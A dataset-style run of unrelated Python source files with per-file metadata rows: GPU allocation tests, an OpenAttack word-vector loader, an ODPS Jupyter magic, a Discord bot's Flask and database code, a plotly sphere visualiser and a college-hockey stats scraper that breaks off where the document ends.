cuda_device = _run_test_get_cuda_device(
existing_allocs=alloc_map, pid=pid, existing_pids=all_pids, n_gpus=3
)
assert cuda_device == expected_cuda_device
def test_get_cuda_device_reuse_allocation_of_previous_pid():
cuda_device = _run_test_get_cuda_device(
existing_allocs={0: [1], 1: [2], 2: [3]}, pid=4, existing_pids=[1, 3], n_gpus=3
)
assert cuda_device == 1
def test_get_cuda_device_caches_cuda_device():
cleanup()
with mock.patch("ml_hadoop_experiment.common.spark_inference._get_cuda_device") \
as _get_cuda_device_mock, \
mock.patch("ml_hadoop_experiment.common.spark_inference.os.getpid") as getpid_mock:
_get_cuda_device_mock.return_value = 0
getpid_mock.return_value = 0
cuda_device = get_cuda_device(n_gpus=1)
assert cuda_device == get_cuda_device(n_gpus=1)
_get_cuda_device_mock.assert_called_once()
def _run_test_get_cuda_device(
existing_allocs: Dict[int, int], pid: int, existing_pids: List[int],
n_gpus: int
) -> int:
cleanup()
with tempfile.NamedTemporaryFile() as lock_tmp, \
tempfile.NamedTemporaryFile() as allocation_tmp, \
mock.patch("ml_hadoop_experiment.common.spark_inference.os.getpid") as getpid_mock, \
mock.patch(
"ml_hadoop_experiment.common.spark_inference._get_all_pids"
) as all_pids_mock, \
_file_locking_mock():
with open(allocation_tmp.name, "w+") as fd:
fd.write(json.dumps(existing_allocs))
getpid_mock.return_value = pid
all_pids_mock.return_value = existing_pids
return get_cuda_device(
n_gpus=n_gpus, lock_file=lock_tmp.name, allocation_file=allocation_tmp.name
)
@contextmanager
def _file_locking_mock():
with mock.patch("ml_hadoop_experiment.common.spark_inference.fcntl") as fcntl_mock:
yield
fcntl_mock.lockf.assert_called_once()
fcntl_mock.lockf.call_args_list == [mock.call(mock.ANY, fcntl.LOCK_EX)]
fcntl_mock.flock.assert_called_once()
fcntl_mock.flock.call_args_list == [mock.call(mock.ANY, fcntl.LOCK_UN)]
def cleanup():
if CUDA_DEVICE_ENV in os.environ:
del os.environ[CUDA_DEVICE_ENV]
| 34.091837 | 97 | 0.679737 | 469 | 3,341 | 4.458422 | 0.198294 | 0.13869 | 0.099474 | 0.056911 | 0.499761 | 0.448111 | 0.349594 | 0.288379 | 0.260641 | 0.064084 | 0 | 0.01904 | 0.214008 | 3,341 | 97 | 98 | 34.443299 | 0.777228 | 0 | 0 | 0.098765 | 0 | 0 | 0.095181 | 0.091589 | 0 | 0 | 0 | 0 | 0.08642 | 1 | 0.08642 | false | 0 | 0.111111 | 0 | 0.209877 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2d0fbf897441b938a8a5cc09355bf7740db8093 | 577 | py | Python | OpenAttack/data/word2vec.py | zangy17/OpenAttack | 9114a8af12680f14684d2bf1bc6a5c5e34f8932c | [
"MIT"
] | 10 | 2021-12-01T15:35:05.000Z | 2022-03-16T16:10:24.000Z | OpenAttack/data/word2vec.py | zangy17/OpenAttack | 9114a8af12680f14684d2bf1bc6a5c5e34f8932c | [
"MIT"
] | null | null | null | OpenAttack/data/word2vec.py | zangy17/OpenAttack | 9114a8af12680f14684d2bf1bc6a5c5e34f8932c | [
"MIT"
] | null | null | null | """
:type: OpenAttack.utils.WordVector
:Size: 1.52GB
Word2vec Word Embedding `[page] <https://code.google.com/archive/p/word2vec/>`__
"""
import numpy as np
import os, pickle
from OpenAttack.utils import WordVector, make_zip_downloader
NAME = "AttackAssist.Word2Vec"
URL = "https://cdn.data.thunlp.org/TAADToolbox/word2vec.zip"
DOWNLOAD = make_zip_downloader(URL)
def LOAD(path):
word2id = pickle.load( open( os.path.join(path, "word2id.pkl"), "rb") )
wordvec = pickle.load( open( os.path.join(path, "wordvec.pkl"), "rb") )
return WordVector(word2id, wordvec)
| 27.47619 | 80 | 0.722704 | 79 | 577 | 5.202532 | 0.582278 | 0.072993 | 0.082725 | 0.077859 | 0.136253 | 0.136253 | 0.136253 | 0 | 0 | 0 | 0 | 0.019724 | 0.121317 | 577 | 20 | 81 | 28.85 | 0.790927 | 0.225303 | 0 | 0 | 0 | 0 | 0.225513 | 0.047836 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2d24631e0565e56e51cf9955017aaa1f1066a38 | 3,334 | py | Python | maxcompute.py | marufeuille/jupyter-pyodps | aecdf4e1e8dfdcf206e0ca4b24902a9f8e7ddc6e | [
"BSD-2-Clause"
] | 2 | 2019-10-11T00:24:27.000Z | 2022-01-28T03:48:44.000Z | maxcompute.py | marufeuille/jupyter-pyodps | aecdf4e1e8dfdcf206e0ca4b24902a9f8e7ddc6e | [
"BSD-2-Clause"
] | null | null | null | maxcompute.py | marufeuille/jupyter-pyodps | aecdf4e1e8dfdcf206e0ca4b24902a9f8e7ddc6e | [
"BSD-2-Clause"
] | null | null | null | from IPython.core.magic import (Magics, magics_class, line_magic, cell_magic)
from IPython.core.magic import (register_line_magic, register_cell_magic)
from io import StringIO
import os
from odps import ODPS
import pandas as pd
@magics_class
class ODPSMagic(Magics):
def __init__(self, shell, odps):
super(ODPSMagic, self).__init__(shell)
self.odps = odps
@cell_magic
def odps(self, line, cell):
sql = StringIO(cell).getvalue()
column = []
fields = []
instance = self.odps.execute_sql(sql)
if sql[0:4].upper() == "DROP" or sql[0:6].upper() == "CREATE" or sql[0:6].upper() == "INSERT":
if instance.is_successful():
return "successfully finished {}".format(sql.strip())
else:
return "Error Occured {}".format(sql.strip())
with instance.open_reader() as reader:
if sql[0:4].upper() == "DESC":
field_flag = False
idx = 1
for record in reader:
for field in record:
if field[1][0:2] == "+-":
continue
if field_flag:
x = field[1][1:-1].split("|")
column.append("FieldName-{}".format(idx))
fields.append(x[0].strip())
column.append("FieldType-{}".format(idx))
fields.append(x[1].strip())
idx += 1
else:
for item in field[1][1:-1].strip().split("|"):
x = item.split(":", 1)
if x[0].strip() == "Field":
field_flag = True
break
if len(x) == 1:
continue
column.append(x[0].strip())
fields.append(x[1].strip() if len(x) == 2 else "")
return pd.DataFrame([fields], columns=column)
else: # SELECT
for record in reader:
c = []
f = []
for field in record:
c.append(field[0])
f.append(field[1])
if len(column) == 0:
column = c
fields.append(f)
return pd.DataFrame(fields, columns=column)
def load_ipython_extension(ipython):
params = {}
for key in ("AccessKeyId", "AccessKeySecret", "Project", "Endpoint"):
val = os.getenv(key)
if val:
params[key] = val
path = os.path.expanduser("~") + "/.aliyun_profile"
if os.path.exists(path):
with open(path) as f:
for item in f.read().strip().split("\n"):
key, param = item.split("=",1)
params[key] = param
elif len(params.keys()) != 4:
raise ValueError("Not Set enough param")
myodps = ODPS(params["AccessKeyId"], params['AccessKeySecret'], params['Project'], endpoint=params['Endpoint'])
magic = ODPSMagic(ipython, myodps)
ipython.register_magics(magic) | 38.767442 | 115 | 0.456509 | 339 | 3,334 | 4.41003 | 0.300885 | 0.010702 | 0.026087 | 0.026756 | 0.161204 | 0.048161 | 0 | 0 | 0 | 0 | 0 | 0.016537 | 0.419616 | 3,334 | 86 | 116 | 38.767442 | 0.756072 | 0.0018 | 0 | 0.118421 | 0 | 0 | 0.064923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039474 | false | 0 | 0.078947 | 0 | 0.184211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2d2d52443d085a6b04c9a7dc3ca757c56edef2a | 6,273 | py | Python | startServer.py | Fifi-Bot/Fifi | 49eb4f34e945976d5e8928c4ebd4bb8f18e89e0e | [
"MIT"
] | 3 | 2021-06-07T04:06:16.000Z | 2021-06-07T04:35:15.000Z | startServer.py | Fifi-Bot/Fifi | 49eb4f34e945976d5e8928c4ebd4bb8f18e89e0e | [
"MIT"
] | 2 | 2021-06-08T05:38:43.000Z | 2021-06-08T15:49:31.000Z | startServer.py | Fifi-Bot/Fifi | 49eb4f34e945976d5e8928c4ebd4bb8f18e89e0e | [
"MIT"
] | 1 | 2021-06-07T04:14:27.000Z | 2021-06-07T04:14:27.000Z | """
MIT License
Copyright (c) 2021 Meme Studios
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from flask import Flask, redirect, render_template
from threading import Thread
#app = Flask('')
def urlparse(url) -> str:
url = str(url)
url.replace(" ", "+")
url.replace("`", "%60")
url.replace("@", "%40")
url.replace("#", "%23")
url.replace("$", "%24")
url.replace("%", "%25")
url.replace("^", "%5E")
url.replace("&", "%26")
url.replace("+", "%2B")
url.replace("=", "%3D")
url.replace("|", "%7C")
url.replace("\\", "%5C")
url.replace("[", "%5B")
url.replace("]", "%5D")
url.replace("{", "%7B")
url.replace("}", "%7D")
url.replace(":", "%3A")
url.replace(";", "%3B")
url.replace("'", "%27")
url.replace(",", "%2C")
url.replace("/", "%2F")
url.replace("?", "%3F")
return url
setFavicon = """
<link rel="Fifi Icon" type="image/png" href="https://cdn.discordapp.com/attachments/749875006238097478/833898070571614228/fifi_icon_transparent_background_revised_revised.png"/>
"""
setFont = """
<link href='https://fonts.googleapis.com/css?family=Comfortaa' rel='stylesheet'>
html {
font-family: 'Comfortaa';
margin: 0 auto;
}
"""
def commandSignature(command):
clean_prefix = "f."
if not command.signature and not command.parent:
return f'"{clean_prefix}{command.name}"'
if command.signature and not command.parent:
return f'"{clean_prefix}{command.name} {command.signature}"'
if not command.signature and command.parent:
return f'"{clean_prefix}{command.parent} {command.name}"'
else:
return f'"{clean_prefix}{command.parent} {command.name} {command.signature}"'
msInvite = "https://discord.gg/3c5kc8M"
from replit import db
#gitbook = db['gitbook']
class FifiServer(Flask):
def __init__(self, bot):
super().__init__('Fifi')
self.bot = bot
#self.app = app
self.route("/")(self.main)
self.route("/status")(self.status)
self.route("/redirect")(self._redirect)
self.route("/stats")(self.status)
self.route("/commands")(self.commands)
self.route("/command")(self.commands)
self.route("/guild")(self.guildInvite)
self.route("/server")(self.guildInvite)
self.route("/suport")(self.guildInvite)
self.route("/invite")(self.botInvite)
self.route("/invites")(self.botInvite)
self.errorhandler(404)(self.unknownPage)
self.route("/license")(self.license)
self.route("/copyright")(self.license)
def unknownPage(self, e):
return render_template('unknown.html')
def license(self):
return """
MIT License
<br><br>
Copyright (c) 2021 Meme Studios
<br><br>
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish,distribute, sublicense, and/or sellcopies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
<br><br>
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
<br><br>
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
def _redirect(self, url):
url = urlparse(url)
return redirect(url)
def botInvite(self):
return render_template('botInvite.html')
def guildInvite(self):
return redirect(f"{msInvite}")
#@app.route("/")
def main(self):
return render_template("main.html") #Get html and display it. yey
#@app.route("/status")
def status(self):
return redirect("https://stats.uptimerobot.com/w7OgnCLQz7")
def commands(self):
s = f"{setFavicon}Note:<br>Arguments with <> means that the argument is required.<br>Arguments with [] means that the argument is optional.<br>DO NOT USE THESE WHEN TYPING COMMANDS<br><br>"
for command in self.bot.commands:
s += f"""
Command {command.name}: <br>- Syntax: {commandSignature(command)}<br>- Aliases: {' | '.join(command.aliases)[:-3]}<br>
"""
if command.cog is None:
s += "- Cog: No Category/None"
else:
s += f"- Cog: {command.cog.qualified_name}"
s += "<br>"
if command._buckets._cooldown is None:
s += "- Cooldown: None"
else:
s += f"""
- Cooldown: <br> - Rate (How long the cooldown lasts in seconds): {command._buckets._cooldown.rate} <br> - Per (How many commands can be triggered before the cooldown hits): {command._buckets._cooldown.per} <br> - Type: Each {str(command._buckets._cooldown.type).lower().replace('commands', '').replace('buckettype', '').replace('.', '').title()}
"""
s += "<br><br>"
return s
def start(self):
server = Thread(target=self.run)
server.start()
def run(self):
super().run(host="0.0.0.0", port=8080) | 37.562874 | 460 | 0.688985 | 862 | 6,273 | 4.975638 | 0.293503 | 0.051294 | 0.012124 | 0.016787 | 0.468641 | 0.450222 | 0.450222 | 0.44719 | 0.410352 | 0.410352 | 0 | 0.017215 | 0.166587 | 6,273 | 167 | 461 | 37.562874 | 0.803175 | 0.188905 | 0 | 0.12069 | 0 | 0.068966 | 0.528763 | 0.082939 | 0 | 0 | 0 | 0 | 0 | 1 | 0.112069 | false | 0 | 0.025862 | 0.051724 | 0.258621 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2d301c47bada44e9826e5be19390403221e5d1a | 984 | py | Python | bot/cogs/database.py | marlondgonzalez/discordbot | 4048a006bdf86084312a6f6b581a0daf8a080efe | [
"MIT"
] | null | null | null | bot/cogs/database.py | marlondgonzalez/discordbot | 4048a006bdf86084312a6f6b581a0daf8a080efe | [
"MIT"
] | null | null | null | bot/cogs/database.py | marlondgonzalez/discordbot | 4048a006bdf86084312a6f6b581a0daf8a080efe | [
"MIT"
] | null | null | null | # Import libraries
import os
import asyncpg
import asyncio
import discord
from dotenv import load_dotenv
from discord.ext import commands, tasks
# Load Env Variables
load_dotenv()
DISCORD_TOKEN = os.getenv("DISCORD_TOKEN")
DATABASE_URL = os.getenv("DATABASE_URL")
class Database(commands.Cog):
def __init__(self, clientbot):
self.clientbot = clientbot
async def createDataBasePool(self):
self.clientbot.pg_con = await asyncpg.create_pool(DATABASE_URL)
print("Establishing connection to database")
await self.clientbot.pg_con.execute("CREATE TABLE IF NOT EXISTS TestRun (UserID bigint, GuildID bigint, UserName varchar(255));")
await self.clientbot.pg_con.execute("CREATE TABLE IF NOT EXISTS Sample (UserID bigint, GuildID bigint, ArgumentName varchar(255), Content text);")
def setup(clientbot):
database = Database(clientbot)
clientbot.add_cog(database)
clientbot.loop.run_until_complete(database.createDataBasePool())
| 35.142857 | 154 | 0.761179 | 125 | 984 | 5.848 | 0.456 | 0.088919 | 0.06156 | 0.073871 | 0.142271 | 0.142271 | 0.142271 | 0.142271 | 0.142271 | 0.142271 | 0 | 0.007186 | 0.151423 | 984 | 27 | 155 | 36.444444 | 0.868263 | 0.035569 | 0 | 0 | 0 | 0.047619 | 0.27167 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.285714 | 0 | 0.428571 | 0.047619 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2d92e4afd67135fc8c61510bcaef3612a2fd653 | 6,142 | py | Python | spherephize/visualize_sphere.py | kathlandgren/spheriphize | 7148ee206c3294f34594ca0cfe28c1bacef3152f | [
"MIT"
] | 1 | 2021-06-25T21:20:55.000Z | 2021-06-25T21:20:55.000Z | spherephize/visualize_sphere.py | kathlandgren/spheriphize | 7148ee206c3294f34594ca0cfe28c1bacef3152f | [
"MIT"
] | null | null | null | spherephize/visualize_sphere.py | kathlandgren/spheriphize | 7148ee206c3294f34594ca0cfe28c1bacef3152f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Jun 23 11:51:58 2021
@author: Kath Landgren
This module contains the Sphere class and the visualization code
"""
import numpy as np
import plotly.graph_objects as go
class Sphere:
"""
Class Sphere
Parameters
----------
num_lat : int
Positive integer, number of latitudes.
num_lon : int
Positive integer, number of longitudes.
temp_type : string
A string: "uniform", "zonal", or "custom".
"""
#init method
def __init__(self, num_lat,num_lon,temp_type):
"""Constructor method
Parameters
----------
num_lat : int
Positive integer, number of latitudes.
num_lon : int
Positive integer, number of longitudes.
temp_type : string
A string: "uniform", "zonal", or "custom".
"""
np.seterr(divide='ignore', invalid='ignore')
self.num_lat=num_lat
self.num_lon=num_lon
self.temp_type=temp_type
assert type(temp_type)==str, "Temperature type must be a string specifying accepted temperature types"
def make_lat(self):
"""
Creates an array of latitudes based on the number of latitudes
Returns
-------
phi : array
Array of latitudes from 0 to pi.
"""
#creates an array of latitudes (phi)
phi=np.linspace(0,np.pi,self.num_lat)
self.phi=phi
return phi
def make_lon(self):
"""
Creates an array of longitudes based on the number of longitudes
Returns
-------
theta : array
Array of longitudes from 0 to 2pi.
"""
#creates an array of longitudes (theta)
theta=np.linspace(0,2*np.pi,self.num_lon)
self.theta=theta
return theta
def make_temp(self,custom_data="None",mean_temp=1000):
"""
Creates the temperature field based on temperature type
Parameters
----------
custom_data : array, optional
Custom temperature data. The default is "None".
mean_temp : float, optional
Mean temperature for the zonal and uniform temperature fields.
The default is 1000.
Returns
-------
data : array
temperature field data
"""
if self.temp_type=="uniform":
#creates uniform temperature field
data=mean_temp*np.ones((self.num_lon,self.num_lat))
elif self.temp_type=="zonal":
#creates zonal temperature field
lat=self.make_lat()
data=np.sin(lat)*mean_temp*np.ones((self.num_lon,self.num_lat))
elif self.temp_type=="custom":
#uses an array
data=custom_data
self.temp=data
return data
def get_temp(self):
"""
Gets the temperature from the object of :class: 'Sphere'
Returns
-------
temp : array
temperature field assigned to the object.
"""
temp=self.temp
return temp
def make_hoverdata(x,y,z,input_temp):
"""
Makes the data that appear when hovering over a point on a sphere,
namely latitude, longitude, and the temperature value
Parameters
----------
x : array
array of x coordinates for the sphere.
y : array
array of y coordinates for the sphere.
z : array
array of z coordinates for the sphere.
input_temp : array
temperature field
Returns
-------
hoverdata : array
Stack of latitude, longitude, and temperature field arrays
"""
trunc_temp= input_temp.round(decimals=0)
lats=np.arcsin(z)*180/np.pi
lats=lats.round(decimals=1)
lons=2*np.arctan(np.divide(y,(x**2+y**2)))*180/np.pi
lons=lons.round(decimals=1)
hoverdata=np.stack((lats.T, lons.T, trunc_temp.T), axis =-1)
return hoverdata
def plot_sphere(planet,theta,phi,temp,cmin=700,cmax=1200,cscale='jet',save=False,name="None"):
"""
This function creates the interactive visualization plot
Parameters
----------
planet : object of class Sphere
the planet
theta : array
longitudes.
phi : array
latitudes.
temp : array
temperature field data
cmin : float, optional
Lower bound on the colorbar, K. The default is 700.
cmax : float, optional
Upper bound on the colorbar, K. The default is 1200.
cscale : string
colormap to use
save : bool, optional
If true, save output as html. The default is False.
name : string, optional
Name of (or path to) html file
Returns
-------
fig : figure
"""
x = np.outer(np.cos(theta),np.sin(phi))
y = np.outer(np.sin(theta),np.sin(phi))
z = np.outer(np.ones(planet.num_lon),np.cos(phi))
hoverdata=make_hoverdata(x,y,z,temp)
#call plotly
fig= go.Figure(go.Surface(x=x, y=y, z=z,surfacecolor=temp,cmax=cmax,cmin=cmin,colorscale=cscale,customdata=hoverdata, hovertemplate ="lat: %{customdata[0]}"+\
"<br>lon: %{customdata[1]}"+\
"<br>temp:%{customdata[2]} K<extra></extra>", \
contours = {
"x": {"show": True, "start": -1, "end": 1, "size": 1, "color":"black"},
"y": {"show": True, "start": -1, "end": 1, "size": 1, "color":"black"},
"z": {"show": True, "start": -1, "end": 1, "size": 1, "color":"black"}
}))
fig.update_layout(scene = dict(
xaxis = dict(
showbackground=False,visible=False),
yaxis = dict(
showbackground=False,visible=False),
zaxis = dict(
showbackground=False,visible=False)))
if save==1:
fig.write_html(name+".html")
return fig | 27.542601 | 165 | 0.549821 | 739 | 6,142 | 4.49797 | 0.255751 | 0.016245 | 0.015042 | 0.028881 | 0.244284 | 0.159146 | 0.159146 | 0.159146 | 0.140493 | 0.140493 | 0 | 0.016466 | 0.337512 | 6,142 | 223 | 166 | 27.542601 | 0.800442 | 0.412732 | 0 | 0.032787 | 0 | 0 | 0.095748 | 0.00837 | 0 | 0 | 0 | 0 | 0.016393 | 1 | 0.114754 | false | 0 | 0.032787 | 0 | 0.262295 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2dae4d4cda680cf412e66d833119134b26b6615 | 10,693 | py | Python | Player Stats Web Scraper.py | sezenack/Red-Army-App | d5a37dd5c59e27eccc805e566f5a4f908303855b | [
"MIT"
] | 3 | 2019-02-18T04:26:00.000Z | 2022-03-17T16:12:23.000Z | Player Stats Web Scraper.py | sezenack/Red-Army-App | d5a37dd5c59e27eccc805e566f5a4f908303855b | [
"MIT"
] | null | null | null | Player Stats Web Scraper.py | sezenack/Red-Army-App | d5a37dd5c59e27eccc805e566f5a4f908303855b | [
"MIT"
] | 4 | 2019-01-29T17:24:02.000Z | 2019-02-22T21:16:20.000Z | import requests
import urllib.request
import time
from bs4 import BeautifulSoup
# Team Stats Skaters
url1 = 'http://collegehockeyinc.com/stats/filters19.php?target=REN'
response1 = requests.get(url1)
soup1 = BeautifulSoup(response1.text, 'html.parser')
table1 = soup1.findAll('td')
infostrings1 = []
i = 0
header = ""
while i < 26:
header += table1[i].get_text() + "\n"
i += 1
infostrings1.append(header)
for t in range(26, 844, 30):
a = 0
string = ""
while a < 30 and a + t < len(table1):
string += table1[t + a].get_text() + "\n"
a += 1
infostrings1.append(string)
# Team Stats Goaltenders
url2 = 'http://collegehockeyinc.com/stats/filters19.php?target=REN&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&wins=on&losses=on&ties=on&otgames=all&start=35&end=224&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=none&limitn=1&limitt=indiv&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=goalie&sort=g'
response2 = requests.get(url2)
soup2 = BeautifulSoup(response2.text, 'html.parser')
table2 = soup2.findAll('td')
infostrings2 = []
i = 0
header = ""
while i < 17:
header += table2[i].get_text() + "\n"
i += 1
infostrings2.append(header)
for t in range(17, 20 * 3 + 17, 20):
a = 0
string = ""
while a < 20 and a + t < len(table2):
txt = table2[t + a].get_text()
if '%' in txt:
txt = txt[0:(txt.index('%') + 1)]
string += txt + "\n"
a += 1
infostrings2.append(string)
# ECAC Player Stats (Main Skater Stats and Main Goaltender Stats)
url3 = 'https://www.ecachockey.com/men/2018-19/leaders'
response3 = requests.get(url3)
soup3 = BeautifulSoup(response3.text, 'html.parser')
table3 = soup3.findAll('tr')
table3 = table3[2:8] + table3[9:15] + table3[16:22] + table3[23:29] + table3[31:37] + table3[38:44]
infostrings3 = []
for t in table3:
infostrings3.append(t.get_text())
# ECAC Skater Points per Game Stats
url4 = 'http://collegehockeyinc.com/stats/filters19.php?target=EC&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=35&end=224&wins=on&losses=on&ties=on&otgames=all&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=none&limitn=1&limitt=indiv&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=p_gm'
response4 = requests.get(url4)
soup4 = BeautifulSoup(response4.text, 'html.parser')
table4 = soup4.findAll('td')
infostrings4 = []
for t in range(27, len(table4), 31):
a = 0
string = ""
while a < 5 and a + t < len(table4):
string += table4[t + a].get_text() + "\n"
a += 1
string += table4[t + 12].get_text() + "\n"
infostrings4.append(string)
# ECAC Skater Shooting % Stats
url5 = 'http://collegehockeyinc.com/stats/filters19.php?target=EC&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=35&end=224&wins=on&losses=on&ties=on&otgames=all&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=none&limitn=1&limitt=indiv&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=shpct'
response5 = requests.get(url5)
soup5 = BeautifulSoup(response5.text, 'html.parser')
table5 = soup5.findAll('td')
infostrings5 = []
for t in range(27, len(table5), 31):
a = 0
string = ""
while a < 5 and a + t < len(table5):
string += table5[t + a].get_text() + "\n"
a += 1
string += table5[t + 24].get_text() + "\n"
infostrings5.append(string)
# ECAC Skater Faceoff % Stats
url6 = 'http://collegehockeyinc.com/stats/filters19.php?target=EC&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=35&end=224&wins=on&losses=on&ties=on&otgames=all&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=none&limitn=1&limitt=indiv&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=fpct'
response6 = requests.get(url6)
soup6 = BeautifulSoup(response6.text, 'html.parser')
table6 = soup6.findAll('td')
infostrings6 = []
for t in range(27, 31 * 69 + 27, 31):
a = 0
string = ""
while a < 5 and a + t < len(table6):
string += table6[t + a].get_text() + "\n"
a += 1
string += table6[t + 27].get_text() + "\n"
infostrings6.append(string)
# ECAC Skater Blocked Shots Stats
url7 = 'http://collegehockeyinc.com/stats/filters19.php?target=EC&conf=on&nonconf=on&playoff=on&ncaa=on&site=all&start=35&end=224&wins=on&losses=on&ties=on&otgames=all&sun=on&mon=on&tue=on&wed=on&thu=on&fri=on&sat=on&limitx=none&limitn=1&limitt=indiv&p1=on&p2=on&p3=on&ot=on&full=on&even=on&pp=on&sh=on&lead=on&tied=on&trail=on&time1=on&time2=on&time3=on&time4=on&time5=on&time6=on&time7=on&time8=on&for=on&def=on&goal=on&fr=on&so=on&jr=on&sr=on&drafted=on&eligible=on&free=on&stats=scoring&sort=blk'
response7 = requests.get(url7)
soup7 = BeautifulSoup(response7.text, 'html.parser')
table7 = soup7.findAll('td')
infostrings7 = []
for t in range(28, 100 * 32 + 28, 32):
a = 0
string = ""
while a < 5 and a + t < len(table7):
string += table7[t + a].get_text() + "\n"
a += 1
string += table7[t + 28].get_text() + "\n"
infostrings7.append(string)
# National Skater Main Stats
url8 = 'http://collegehockeyinc.com/stats/filters19.php'
response8 = requests.get(url8)
soup8 = BeautifulSoup(response8.text, 'html.parser')
table8 = soup8.findAll('td')
infostrings8 = []
for t in range(27, len(table8), 31):
a = 0
string = ""
while a < 10 and a + t < len(table8):
if a == 5 or a == 6:
a += 1
continue
string += table8[t + a].get_text() + "\n"
a += 1
string += table8[t + 12].get_text() + "\n"
infostrings8.append(string)
# National Skater Plus/Minus Stats
